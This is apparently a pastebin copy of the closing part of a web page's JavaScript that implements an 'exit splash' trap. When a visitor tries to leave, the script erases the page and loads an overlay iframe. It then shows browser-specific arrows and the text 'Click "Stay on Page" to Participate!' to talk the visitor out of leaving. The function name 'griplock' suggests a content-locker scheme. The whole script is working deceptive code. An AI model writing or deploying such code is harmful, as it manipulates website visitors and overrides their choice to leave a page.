  1084. the_html += '<table height="100%"><tr valign="middle"><td style="vertical-align:middle;"><div id="the_box" style="background-color:white; height: 125px; margin-top:-105px; width:610px; border:1px solid white; border-radius:5px; -webkit-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);-moz-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75); box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);"><div style="text-align:center; padding:50px; font-weight:bold; font-size:18px; color:lightgrey;">Loading...</div><div style="position:absolute;"><div style="position:relative;left:330px; top:10px;"><div style="width: 0; height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 20px solid white;"></div><div style="color:white; position:absolute;"><div class="translate_text" style="padding:5px; border-radius:5px; background-color: black; width: 188px; position:relative; top: 10px; font-weight:bold; font-size:15px;">Click <i>"Stay on Page"</i> to Participate!</div></div></div></div></td></tr></table>';
  1085. }else if(jQuery.browser.chrome){
  1086. the_html += '<table height="100%"><tr valign="middle"><td style="vertical-align:middle;"><div id="the_box" style="background-color:white; height: 238px; margin-top:-95px; width:362px; border:1px solid white; border-radius:5px; -webkit-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);-moz-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75); box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);"><div style="text-align:center; padding:108px; font-weight:bold; font-size:18px; color:lightgrey;">Loading...</div><div style="position:absolute;"><div style="position:relative;left:270px; top:20px;"><div style="width: 0; height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 20px solid white;"></div><div style="color:white; position:absolute;"><div class="translate_text" style="padding:5px; border-radius:5px; background-color: black; width: 188px; position:relative; left: 20px; top: 10px; font-weight:bold; font-size:15px;">Click <i>"Stay on this Page"</i> to Participate!</div></div></div></div></td></tr></table>';
  1087. }else if(jQuery.browser.msie){
  1088. the_html += '<table height="100%"><tr valign="middle"><td style="vertical-align:middle;"><div id="the_box" style="background-color:white; height: 275px; margin-top:-165px; margin-left:15px; width:388px; border:1px solid white; border-radius:5px; -webkit-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);-moz-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75); box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);"><div style="text-align:center; padding:127px; font-weight:bold; font-size:18px; color:lightgrey;">Loading...</div><div style="position:absolute;"><div style="position:relative;left:145px; top:20px;"><div style="width: 0; height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 20px solid white;"></div><div style="color:white; position:absolute;"><div class="translate_text" style="padding:5px; border-radius:5px; background-color: black; width: 188px; position:relative; left: -8px; top: 10px; font-weight:bold; font-size:15px;">Click <i>"Stay on this Page"</i> to Participate!</div></div></div></div></td></tr></table>';
  1089. }else if(jQuery.browser.safari && !jQuery.browser.chrome){
  1090. the_html += '<table height="100%"><tr valign="middle"><td style="vertical-align:middle;"><div id="the_box" style="background-color:white; height: 275px; margin-top:-165px; margin-left:15px; width:388px; border:1px solid white; border-radius:5px; -webkit-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);-moz-box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75); box-shadow: 0px 0px 120px 5px rgba(255, 255, 255, .75);"><div style="text-align:center; padding:127px; font-weight:bold; font-size:18px; color:lightgrey;">Loading...</div><div style="position:absolute;"><div style="position:relative;left:145px; top:20px;"><div style="width: 0; height: 0;border-left: 15px solid transparent;border-right: 15px solid transparent;border-bottom: 20px solid white;"></div><div style="color:white; position:absolute;"><div class="translate_text" style="padding:5px; border-radius:5px; background-color: black; width: 188px; position:relative; left: -8px; top: 10px; font-weight:bold; font-size:15px;">Click <i>"Stay on this Page"</i> to Participate!</div></div></div></div></td></tr></table>';
  1091. exitsplashmessage = 'Click Stay on Page.';
  1092. }
  1093. the_html += '</div><div id="main_back" style="display:block; width:100%; height:100%; position:absolute; background:#000000; opacity: 0.5;"></div>';
  1094.  
  1095. var theDiv = '<div onmouseover="load_slidepage();" id="ExitSplashDiv" style="display:block; width:100%; height:100%; position:absolute; margin-top:0px; margin-left:0px;" align="center">';
  1096. theDiv = theDiv + the_html;
  1097. theDiv = theDiv + '<iframe src="' + exitsplashpage + '" width="100%" height="100%" align="middle" frameborder="0"></iframe>';
  1098. theDiv = theDiv + '</div>';
  1099. theBody = document.body;
  1100. if (!theBody) {
  1101. theBody = document.getElementById("body");
  1102. if (!theBody) {
  1103. theBody = document.getElementsByTagName("body")[0];
  1104. }
  1105. }
  1106. var PreventExitSplash = false;
  1107. function DisableExitSplash() {
  1108. PreventExitSplash = true;
  1109. }
  1110.  
  1111. function EnableExitSplash() {
  1112. PreventExitSplash = false;
  1113. }
  1114.  
  1115. function DisplayExitSplash() {
  1116. if(bypass == false){
  1117. if (PreventExitSplash == false) {
  1118. window.scrollTo(0, 0);
  1119. PreventExitSplash = true;
  1120. divtag = document.createElement("div");
  1121. divtag.setAttribute("id", "ExitSplashMainOuterLayer");
  1122. divtag.style.position = "absolute";
  1123. divtag.style.width = "100%";
  1124. divtag.style.height = "100%";
  1125. divtag.style.zIndex = "99";
  1126. divtag.style.left = "0px";
  1127. divtag.style.top = "0px";
  1128. divtag.innerHTML = theDiv;
  1129. theBody.innerHTML = "";
  1130. theBody.topMargin = "0px";
  1131. theBody.rightMargin = "0px";
  1132. theBody.bottomMargin = "0px";
  1133. theBody.leftMargin = "0px";
  1134. theBody.style.overflow = "hidden";
  1135. theBody.appendChild(divtag);
  1136. return exitsplashmessage;
  1137. } else {
  1138. PreventExitSplash = false;
  1139. }
  1140. }
  1141. }
  1142.  
  1143. var a = document.getElementsByTagName('A');
  1144. for (var i = 0; i < a.length; i++) {
  1145. if (a[i].target !== '_blank') {
  1146. addClickEvent(a, i, function() {
  1147. PreventExitSplash = true;
  1148. });
  1149. } else {
  1150. addClickEvent(a, i, function() {
  1151. PreventExitSplash = false;
  1152. });
  1153. }
  1154. }
  1155. disablelinksfunc = function() {
  1156. var a = document.getElementsByTagName('A');
  1157. for (var i = 0; i < a.length; i++) {
  1158. if (a[i].target !== '_blank') {
  1159. addClickEvent(a, i, function() {
  1160. PreventExitSplash = true;
  1161. });
  1162. } else {
  1163. addClickEvent(a, i, function() {
  1164. PreventExitSplash = false;
  1165. });
  1166. }
  1167. }
  1168. };
  1169.  
  1170. addLoadEvent(disablelinksfunc);
  1171. window.onbeforeunload = DisplayExitSplash;
  1172.  
  1173.  
  1174. });
  1175.  
  1176. }else{
  1177. setTimeout('griplock()',1000);
  1178. }
  1179. }
  1180.  
  1181. var exit_ready = false;
  1182. function load_slidepage(){
  1183. if(exit_ready==false){
  1184. exit_ready = true;
  1185. jQuery('#the_box').html('');
  1186. jQuery('#the_box').animate({
  1187. height: '0px'
  1188. }, 500, function() {
  1189. jQuery('#main_div').hide();
  1190. jQuery('#main_back').hide();
  1191.  
  1192. });
  1193. }
  1194. }
  1195.  
  1196. </script>
  1197. </body>
  1198. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement